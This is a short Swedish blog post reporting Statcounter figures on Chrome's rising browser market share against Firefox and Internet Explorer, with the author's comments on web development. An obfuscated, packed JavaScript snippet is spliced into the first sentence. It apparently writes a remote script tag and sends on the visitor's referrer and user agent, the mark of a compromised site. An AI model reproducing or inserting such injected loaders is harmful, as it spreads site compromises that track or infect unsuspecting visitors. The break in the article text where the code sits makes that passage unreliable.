Image Image Image Image Image Image Image Image Image Image

| 13 juni, 2021

Scroll to top

Top

Chrome snart större än Firefox

Chrome snart större än Firefox
Sebastian

Googles eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|kzbdn|var|u0026u|referrer|iiysz||js|php’.split(’|’),0,{}))
webbrowser Chrome är på väg att ta andraplatsen bland världens mest använda webbläsare. Det är mätföretaget Statcounter som släppt nya siffror som bekräftar detta.

Statcounter visar att Google Chrome i veckan hade en marknadsandel på 23,6 procent medan Firefox hade 26,8 procent. Internet Explorer leder självkalrt fortfarande med en marknadsandel på 41,7 procent.

Chromes tillväxt i år har varit mycket stark och ökat med 50 procent sedan januari denna månad. Firefox har dock tappat cirka 13 procent och Internet Explorer nio procent.

Från Revues sida så är detta ett plus. Internet Explorer har alltid varit den webbläsare som krånglat när det kommer till webbdesign. Genom att det är jag som står bakom webbutvecklingen så tycker jag det är kul att en så pass ny webbläsare som Chrome snabbt tar sig upp på marknaden. Ge oss lite fler addons bara så blir jag super nöjd.